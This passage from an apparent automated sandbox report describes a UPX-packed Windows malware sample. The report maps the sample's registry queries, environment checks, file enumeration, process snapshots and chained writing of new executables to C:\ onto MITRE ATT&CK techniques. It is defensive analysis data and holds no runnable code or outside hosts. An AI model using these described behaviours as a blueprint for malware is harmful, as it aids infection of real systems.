\"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"IsWow64Process\" with parameter \"4116\" - (UID: 00000000-00004116)\n \"hnvpxj.exe\" called \"IsWow64Process\" with parameter \"6032\" - (UID: 00000000-00006032)\n \"lbjvvjh.exe\" called \"IsWow64Process\" with parameter \"6128\" - (UID: 00000000-00006128)\n \"pdvxbf.exe\" called \"IsWow64Process\" with parameter \"6080\" - (UID: 00000000-00006080)\n \"frdfrrr.exe\" called \"IsWow64Process\" with parameter \"6060\" - (UID: 00000000-00006060)\n \"464448.exe\" called \"IsWow64Process\" with parameter \"3568\" - (UID: 00000000-00003568)\n \"jlrnp.exe\" called \"IsWow64Process\" with parameter \"5996\" - (UID: 00000000-00005996)\n \"686200.exe\" called \"IsWow64Process\" with parameter \"2528\" - (UID: 00000000-00002528)\n \"026288.exe\" called \"IsWow64Process\" with parameter \"1416\" - (UID: 00000000-00001416)\n \"6088244.exe\" called \"IsWow64Process\" with parameter \"1696\" - (UID: 00000000-00001696)\n \"826268.exe\" called \"IsWow64Process\" with parameter \"2648\" - (UID: 00000000-00002648)\n \"phdjp.exe\" called \"IsWow64Process\" with parameter \"4040\" - (UID: 00000000-00004040)\n \"dtlrb.exe\" called \"IsWow64Process\" with parameter \"4496\" - (UID: 00000000-00004496)\n \"jrfndd.exe\" called \"IsWow64Process\" with parameter \"2136\" - (UID: 00000000-00002136)\n \"nvphdb.exe\" called \"IsWow64Process\" with parameter \"3900\" - (UID: 00000000-00003900)\n \"djlfb.exe\" called \"IsWow64Process\" with parameter \"4132\" - (UID: 00000000-00004132)\n \"46420.exe\" called \"IsWow64Process\" with parameter \"3908\" - (UID: 00000000-00003908)\n \"208666.exe\" called \"IsWow64Process\" with parameter \"3768\" - (UID: 00000000-00003768)\n \"08684.exe\" called \"IsWow64Process\" with parameter \"2596\" - (UID: 00000000-00002596)\n \"flrpd.exe\" called \"IsWow64Process\" with parameter \"4292\" - (UID: 00000000-00004292)\n \"pjjvtd.exe\" called \"IsWow64Process\" with parameter \"1500\" - (UID: 00000000-00001500)\n \"tlxll.exe\" called \"IsWow64Process\" with parameter \"3452\" - (UID: 00000000-00003452)\n \"fxrlrh.exe\" called \"IsWow64Process\" with parameter \"3180\" - (UID: 00000000-00003180)\n \"nrjljrp.exe\" called \"IsWow64Process\" with parameter \"3460\" - (UID: 00000000-00003460)\n \"44266.exe\" called \"IsWow64Process\" with parameter \"3720\" - (UID: 00000000-00003720)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000330068b4330063b43300000000000000000000002c00000000011ce312000000000080f0120095e1d47799373700feffffff435cd8775059d877aa000000b800000062b4330060b43300a4e41200dce81200000000000000000000000000000000000000000000000000001a000000002c001c5cd77760d8d675ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd8778ab43300a06aae7586000000a4e41200dce812000000000086008800a06aae75a4e41200916cae758ab43300a06aae75a06aae7514e9120002020000 (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004116)\n \"2680282.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003600c8313600c3313600000000000000000000002e00000000011ce312000000000080f0120095e1d47738353700feffffff435cd8775059d877aa000000b8000000c2313600c0313600a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cd77760d8d675ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd877ea313600a06aae7586000000a4e41200dce812000000000086008800a06aae75a4e41200916cae75ea313600a06aae75a06aae7514e9120002020000 (UID: 00000000-00003556)\n \"2680282.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003556)\n \"hnvpxj.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006032)\n \"hnvpxj.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003000f8643000f364300000000000000000000000280000000001ecdf12000000000050ed120095e1d4777c3b3700feffffff435cd8775059d877aa000000b8000000f2643000f064300074e11200ace51200000000000000000000000000000000000000000000000000e01a0000000028001c5cd77760d8d675ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096edd8771a653000a06aae758600000074e11200ace512000000000086008800a06aae7574e11200916cae751a653000a06aae75a06aae75e4e5120002020000 (UID: 00000000-00006032)\n \"hnvpxj.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006032)\n \"hrrnrd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002b0018302b0013302b00000000000000000000002300000000011ce312000000000080f0120095e1d477cd383700feffffff435cd8775059d877aa000000b800000012302b0010302b00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cd77760d8d675ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd8773a302b00a06aae7586000000a4e41200dce812000000000086008800a06aae75a4e41200916cae753a302b00a06aae75a06aae7514e9120002020000 (UID: 00000000-00004376)\n \"hrrnrd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004376)\n \"xxjrxn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100603021005b302100000000000000000000001900000000011ce312000000000080f0120095e1d477c73f3700feffffff435cd8775059d877aa000000b80000005a30210058302100a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cd77760d8d675ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd87782302100a06aae7586000000a4e41200dce812000000000086008800a06aae75a4e41200916cae7582302100a06aae75a06aae7514e9120002020000 (UID: 00000000-00004380)\n \"xxjrxn.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004380)\n \"btpbndn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002600a8302600a3302600000000000000000000001e00000000011ce312000000000080f0120095e1d477d03e3700feffffff435cd8775059d877aa000000b8000000a2302600a0302600a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cd77760d8d675ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd877ca302600a06aae7586000000a4e41200dce812000000000086008800a06aae75a4e41200916cae75ca302600a06aae75a06aae7514e9120002020000 (UID: 00000000-00004120)\n \"btpbndn.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004120)\n \"lbjvvjh.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006128)\n \"lbjvvjh.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000220070b322006bb32200000000000000000000001b00000000011ce312000000000080f0120095e1d477d93d3700feffffff435cd8775059d877aa000000b80000006ab3220068b32200a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001b001c5cd77760d8d675ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd87792b32200a06aae7586000000a4e41200dce812000000000086008800a06aae75a4e41200916cae7592b32200a06aae75a06aae7514e9120002020000 (UID: 00000000-00006128)\n \"lbjvvjh.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006128)\n \"pdvxbf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006080)\n \"pdvxbf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a00d8ae2a00d3ae2a00000000000000000000002300000000011ce312000000000080f0120095e1d477aa233700feffffff435cd8775059d877aa000000b8000000d2ae2a00d0ae2a00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cd77760d8d675ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd877faae2a00a06aae7586000000a4e41200dce812000000000086008800a06aae75a4e41200916cae75faae2a00a06aae75a06aae7514e9120002020000 (UID: 00000000-00006080)\n \"pdvxbf.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006080)\n \"txbxjp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002c0016000000aa000000000000000000000080472e00486a2c00b06b2c00b8ac330060762c007200640078e312007200720080f01200b8ac3300e9e9d877b8ac330000000000aa000000a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cd77760d8d675ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd877daac3300a06aae7586000000a4e41200dce812000000000086008800a06aae75a4e41200916cae75daac3300a06aae75a06aae7514e9120002020000 (UID: 00000000-00004372)\n \"txbxjp.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004372)\n \"frdfrrr.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006060)\n \"frdfrrr.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000340080b634007bb63400000000000000000000002d00000000011ce312000000000080f0120095e1d47736263700feffffff435cd8775059d877aa000000b80000007ab6340078b63400a4e41200dce81200000000000000000000000000000000000000000000000000e019000000002d001c5cd77760d8d675ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edd877a2b63400a06aae7586000000a4e41200dce812000000000086008800a06aae75a4e41200916cae75a2b63400a06aae75a06aae7514e9120002020000 (UID: 00000000-00006060)\n \"frdfrrr.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006060)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter 2680282.exe (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter 3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00004116)\n \"2680282.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00003556)\n \"2680282.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00003556)\n \"2680282.exe\" called \"FindNextFileW\" with parameter 2680282.exe (UID: 00000000-00003556)\n \"2680282.exe\" called \"FindNextFileW\" with parameter 3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe (UID: 00000000-00003556)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hnvpxj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lbjvvjh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pdvxbf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"frdfrrr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"464448.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jlrnp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"686200.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"026288.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"6088244.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"826268.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"phdjp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dtlrb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jrfndd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nvphdb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"djlfb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"46420.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"208666.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"08684.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"flrpd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"pjjvtd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tlxll.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fxrlrh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nrjljrp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"44266.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084\" has an entrypoint in section \"UPX1\"\n \"jvhfn.exe\" has an entrypoint in section \"UPX1\"\n \"042468.exe\" has an entrypoint in section \"UPX1\"\n \"2626426.exe\" has an entrypoint in section \"UPX1\"\n \"8428466.exe\" has an entrypoint in section \"UPX1\"\n \"npxxxd.exe\" has an entrypoint in section \"UPX1\"\n \"pffjpht.exe\" has an entrypoint in section \"UPX1\"\n \"vjxrx.exe\" has an entrypoint in section \"UPX1\"\n \"trnnjf.exe\" has an entrypoint in section \"UPX1\"\n \"ttfvnn.exe\" has an entrypoint in section \"UPX1\"\n \"240606.exe\" has an entrypoint in section \"UPX1\"\n \"6402288.exe\" has an entrypoint in section \"UPX1\"\n \"bttfvf.exe\" has an entrypoint in section \"UPX1\"\n \"hnjnfnj.exe\" has an entrypoint in section \"UPX1\"\n \"rjfjrfn.exe\" has an entrypoint in section \"UPX1\"\n \"jfhhd.exe\" has an entrypoint in section \"UPX1\"\n \"6804604.exe\" has an entrypoint in section \"UPX1\"\n \"42828.exe\" has an entrypoint in section \"UPX1\"\n \"068420.exe\" has an entrypoint in section \"UPX1\"\n \"4640804.exe\" has an entrypoint in section \"UPX1\"\n \"866846.exe\" has an entrypoint in section \"UPX1\"\n \"22840.exe\" has an entrypoint in section \"UPX1\"\n \"24642.exe\" has an entrypoint in section \"UPX1\"\n \"240802.exe\" has an entrypoint in section \"UPX1\"\n \"tbnhh.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" wrote 14443 bytes starting with PE header signature to file \"C:\\2680282.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2680282.exe\" wrote 14458 bytes starting with PE header signature to file \"C:\\hnvpxj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hnvpxj.exe\" wrote 14470 bytes starting with PE header signature to file \"C:\\hrrnrd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hrrnrd.exe\" wrote 14487 bytes starting with PE header signature to file \"C:\\xxjrxn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xxjrxn.exe\" wrote 14497 bytes starting with PE header signature to file \"C:\\btpbndn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"btpbndn.exe\" wrote 14515 bytes starting with PE header signature to file \"C:\\lbjvvjh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lbjvvjh.exe\" wrote 14533 bytes starting with PE header signature to file \"C:\\pdvxbf.exe\": 